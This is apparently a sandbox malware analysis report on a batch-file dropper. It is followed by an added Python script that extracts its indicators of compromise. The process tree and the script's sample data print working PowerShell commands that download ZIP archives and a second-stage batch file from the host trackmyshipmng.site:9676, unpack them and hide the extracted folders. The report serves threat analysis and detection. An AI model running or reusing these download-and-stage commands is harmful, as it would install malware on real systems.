Analysis

  • max time kernel
    15s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  • submitted
    15/08/2024, 16:50

General

  • Target

    new.bat

  • Size

    18.0MB

  • MD5

    35168f928a81982fc428113f484ea21e

  • SHA1

    2029d685911c351cea2857e12c1755df330e4978

  • SHA256

    496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344

  • SHA512

    4b2dc4e91c04180cb372460231e75270252f389231d759bcd96af05dbb479647d39e860e3f22dcf7041e8ec214a1a12125e8ccf52cd26f87d13ee163d58726ec

  • SSDEEP

    48:HmGJ3NlBmmTaQgTymDyb4J7rmxo6rmxoAbYk8OkeFhCaoe1aLHtZQ5ImvBSygyGV:H9FmmNfjwhSCu7OmLT7SkoLEu3S0yhr

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2820
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2740
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2500
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2680
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Print"
      2⤵
      • Views/modifies file attributes
      PID:1364
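
The process tree above is a textbook stager chain: cmd.exe runs the dropped batch file, which uses PowerShell Invoke-WebRequest to pull two ZIP archives and a second batch script over plaintext HTTP from a non-standard port, unpacks the archives into the user's Downloads folder with Expand-Archive, and then hides the extracted folders with attrib +h. The following Python script is an added worked example, not part of the Triage report; it retypes the observed command lines as constructed sample input and shows how an analyst would pull the network and file IOCs out of the tree and flag the download-extract-hide chain (cleartext HTTP, non-standard port, a downloaded .bat, and a REM comment that was placed on the same line as the timeout command, so its words are passed to timeout.exe as arguments). The record layout (pid, parent pid, image, command line) is an assumption for this example and is not a Triage export format.

```python
"""Extract IOCs and flag the download-extract-hide chain from a process tree.

Added example (not part of the Triage report). The PROCESSES records below are
constructed from the command lines shown in the report's Processes section.
"""
import re
from urllib.parse import urlparse

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DL = r"C:\Users\Admin\Downloads"


def iwr(url, out):
    """Rebuild the Invoke-WebRequest one-liner exactly as it appears in the tree."""
    return ("powershell -Command \"& { [Net.ServicePointManager]::SecurityProtocol = "
            "[Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri '" + url +
            "' -OutFile '" + out + "' }\"")


def expand(zip_path, dest):
    """Rebuild the Expand-Archive one-liner as it appears in the tree."""
    return ("powershell -Command \"& { Expand-Archive -Path '" + zip_path +
            "' -DestinationPath '" + dest + "' -Force }\"")


# Constructed sample input: (pid, parent pid, image, command line), taken from the report.
PROCESSES = [
    (2176, 0, r"C:\Windows\system32\cmd.exe", r'cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"'),
    (2692, 2176, PS, iwr("http://trackmyshipmng.site:9676/DXJS.zip", DL + r"\DXJS.zip")),
    (2820, 2176, PS, expand(DL + r"\DXJS.zip", DL)),
    (2740, 2176, r"C:\Windows\system32\timeout.exe",
     "timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)"),
    (2500, 2176, r"C:\Windows\system32\attrib.exe", 'attrib +h "' + DL + r'\Python"'),
    (2816, 2176, PS, iwr("http://trackmyshipmng.site:9676/startupppp.bat", DL + r"\startupppp.bat")),
    (268, 2176, PS, iwr("http://trackmyshipmng.site:9676/FTSP.zip", DL + r"\FTSP.zip")),
    (2680, 2176, PS, expand(DL + r"\FTSP.zip", DL)),
    (1364, 2176, r"C:\Windows\system32\attrib.exe", 'attrib +h "' + DL + r'\Print"'),
]

URI_RE = re.compile(r"Invoke-WebRequest\s+-Uri\s+'([^']+)'\s+-OutFile\s+'([^']+)'")
EXPAND_RE = re.compile(r"Expand-Archive\s+-Path\s+'([^']+)'\s+-DestinationPath\s+'([^']+)'")
ATTRIB_RE = re.compile(r'attrib\s+\+h\s+"([^"]+)"', re.IGNORECASE)
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js")


def analyze(processes):
    """Return extracted IOCs and de-duplicated findings for a list of process records."""
    r = {"urls": [], "hosts": set(), "ports": set(), "downloads": {},
         "archives": {}, "hidden": [], "findings": []}

    def note(msg):
        if msg not in r["findings"]:
            r["findings"].append(msg)

    for _pid, _ppid, image, cmdline in processes:
        name = image.rsplit("\\", 1)[-1].lower()
        if name == "powershell.exe":
            m = URI_RE.search(cmdline)
            if m:
                url, out = m.groups()
                u = urlparse(url)
                r["urls"].append(url)
                r["hosts"].add(u.hostname)
                r["ports"].add(u.port or (443 if u.scheme == "https" else 80))
                r["downloads"][url] = out
                if u.scheme == "http":
                    note(f"cleartext HTTP download from {u.netloc}")
                if u.port not in (None, 80, 443):
                    note(f"non-standard port {u.port} on {u.hostname}")
                if out.lower().endswith(SCRIPT_EXT):
                    note(f"second-stage script written to {out}")
            m = EXPAND_RE.search(cmdline)
            if m:
                r["archives"][m.group(1)] = m.group(2)  # zip path -> destination dir
        elif name == "attrib.exe":
            m = ATTRIB_RE.search(cmdline)
            if m:
                r["hidden"].append(m.group(1))
        elif name == "timeout.exe" and re.search(r"\bREM\b", cmdline):
            # REM only starts a comment at the beginning of a batch line; here cmd.exe
            # hands the comment text to timeout.exe as extra arguments.
            note("REM comment on the same line as timeout; its text is passed as arguments")

    # Chain: an archive that was downloaded, extracted, and then had a folder under
    # its destination hidden with attrib +h.
    for url, out in r["downloads"].items():
        dest = r["archives"].get(out)
        if dest and any(h.lower().startswith(dest.lower() + "\\") for h in r["hidden"]):
            note(f"download-extract-hide chain: {url} -> {dest}")
    r["chain"] = any(f.startswith("download-extract-hide") for f in r["findings"])
    r["urls"].sort()
    return r


if __name__ == "__main__":
    result = analyze(PROCESSES)
    for key in ("urls", "hosts", "ports", "hidden"):
        print(f"{key}: {sorted(result[key])}")
    for finding in result["findings"]:
        print("-", finding)
```

Run stand-alone, the script prints the single C2 host and port, the three fetched URLs, the two hidden folders, and the findings list; feeding it process-creation events from a real EDR export only requires mapping them onto the (pid, parent pid, image, command line) tuple shape.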

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    b4a19d98a1f6fb7b13dbd09c876b1bf6

    SHA1

    020ac698614e2262a53a77f09767b7b25e0c5f08

    SHA256

    334bc694d1a8543421e6f985e981435e9ac6e155a4e685cf7ec376e59520a4ef

    SHA512

    8548dcd00e7a834f7cda271f022179f294258ce2da615730f2dfea1ad2a32315db013835d9f0499016b42b0dab8cbd44946da3ee684df12f6e01b091d851c636

  • memory/2692-4-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

    Filesize

    4KB

  • memory/2692-5-0x000000001B740000-0x000000001BA22000-memory.dmp

    Filesize

    2.9MB

  • memory/2692-7-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2692-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2692-9-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2692-6-0x0000000001BF0000-0x0000000001BF8000-memory.dmp

    Filesize

    32KB

  • memory/2692-10-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2692-11-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2820-17-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

    Filesize

    2.9MB

  • memory/2820-18-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB